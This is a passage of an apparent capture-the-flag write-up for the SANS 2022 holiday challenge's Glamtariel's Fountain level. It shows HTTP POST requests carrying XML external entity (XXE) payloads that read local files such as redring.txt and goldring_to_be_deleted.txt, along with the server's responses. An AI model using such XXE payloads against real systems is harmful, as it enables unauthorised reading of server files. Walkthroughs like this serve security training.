&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don&amp;#39;t keep any secrets in it any more! Please though, don&amp;#39;t tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;static/images/pholder-morethantopsupersecret63842.png,262px,100px&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get an image to a secret folder:&lt;/p&gt;
&lt;img alt="A yellow folder, containing two files." class="align-center" src="/images/sans-christmas-challenge-2022/pholder-morethantopsupersecret63842.png" /&gt;
&lt;p&gt;The folder is labeled &lt;code&gt;x_phial_pholder_2022&lt;/code&gt; and contains two files:
&lt;code&gt;redring.txt&lt;/code&gt; and &lt;code&gt;bluering.txt&lt;/code&gt;. Let's take a look at the blue
ring file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Ijc0MzU2YzI1NTU1NmJhMjQ2Mzc4NjYzMWYwNTg1N2ViNmYyNmFkMWUi.Y7bJLw.CoFMFSmUXQ7Ke7ol0JnKxs88EbE&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;269&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE foo [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;&amp;lt;!ENTITY example SYSTEM &amp;quot;file:///app/static/images/x_phial_pholder_2022/bluering.txt&amp;quot;&amp;gt;&lt;/span&gt;
&lt;/span&gt;]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
 &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;example;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;xml&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 05 Jan 2023 13:39:56 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;274&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;I love these fancy blue rings! You can see we have two of them. Not magical or anything, just really pretty.^She definitely tries to convince everyone that the blue ones are her favorites. I&amp;#39;m not so sure though.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, nothing, let's see with the red ring:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Ijc0MzU2YzI1NTU1NmJhMjQ2Mzc4NjYzMWYwNTg1N2ViNmYyNmFkMWUi.Y7bJLw.CoFMFSmUXQ7Ke7ol0JnKxs88EbE&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;268&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE foo [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;&amp;lt;!ENTITY example SYSTEM &amp;quot;file:///app/static/images/x_phial_pholder_2022/redring.txt&amp;quot;&amp;gt;&lt;/span&gt;
&lt;/span&gt;]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
 &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;example;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;xml&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 05 Jan 2023 13:39:40 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;223&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Hmmm, you still seem awfully interested in these rings. I can&amp;#39;t blame you, they are pretty nice.^Oooooh, I can just tell she&amp;#39;d like to talk about them some more.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Still nothing... What about the silver ring? Glamtariel does not have one,
let's see what she has to say about it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Ijc0MzU2YzI1NTU1NmJhMjQ2Mzc4NjYzMWYwNTg1N2ViNmYyNmFkMWUi.Y7bJLw.CoFMFSmUXQ7Ke7ol0JnKxs88EbE&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;271&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE foo [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;&amp;lt;!ENTITY example SYSTEM &amp;quot;file:///app/static/images/x_phial_pholder_2022/silverring.txt&amp;quot;&amp;gt;&lt;/span&gt;
&lt;/span&gt;]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
 &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;example;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;xml&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Werkzeug/2.2.2 Python/3.10.8&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 05 Jan 2023 13:40:12 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;368&lt;/span&gt;
&lt;span class="na"&gt;Set-Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao; Domain=glamtarielsfountain.com; Path=/&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;h3=&amp;quot;:443&amp;quot;; ma=2592000,h3-29=&amp;quot;:443&amp;quot;; ma=2592000&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;appResp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;I&amp;#39;d so love to add that silver ring to my collection, but what&amp;#39;s this? Someone has defiled my red ring! Click it out of the way please!.^Can&amp;#39;t say that looks good. Someone has been up to no good. Probably that miserable Grinchum!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;droppedOn&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;none&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nt"&gt;&amp;quot;visit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get a picture of the red ring but...&lt;/p&gt;
&lt;img alt="Glamtariel's red ring, but something is written on it." class="align-center" src="/images/sans-christmas-challenge-2022/redring-supersupersecret928164.png" /&gt;
&lt;p&gt;The inside of the red ring reads &lt;code&gt;goldring_to_be_deleted.txt&lt;/code&gt;. Let's ask
Glamtariel about this interesting file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/dropped&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GCLB=&amp;quot;245893ca62dcb86d&amp;quot;; MiniLembanh=408dde46-71cf-440e-a273-f801f09c640c.-A_2od6HzDxSWK9x5SxwJURAsao&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/xml&lt;/span&gt;
&lt;span class="na"&gt;X-Grinchum&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Ijc0MzU2YzI1NTU1NmJhMjQ2Mzc4NjYzMWYwNTg1N2ViNmYyNmFkMWUi.Y7bJLw.CoFMFSmUXQ7Ke7ol0JnKxs88EbE&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;283&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://glamtarielsfountain.com/&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;empty&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot; ?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE foo [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;&amp;lt;!ENTITY example SYSTEM &amp;quot;file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt&amp;quot;&amp;gt;&lt;/span&gt;
&lt;/span&gt;]&amp;gt;
&lt;span class="nt"&gt;&amp;lt;root&amp;gt;&lt;/span&gt;
 &lt;span class="nt"&gt;&amp;lt;imgDrop&amp;gt;&lt;/span&gt;&lt;span class="ni"&gt;&amp;amp;example;&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/imgDrop&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;who&amp;gt;&lt;/span&gt;princess&lt;span class="nt"&gt;&amp;lt;/who&amp;gt;&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;lt;reqType&amp;gt;&lt;/span&gt;xml&lt;span class="nt"&gt;&amp;lt;/reqType&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/root&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
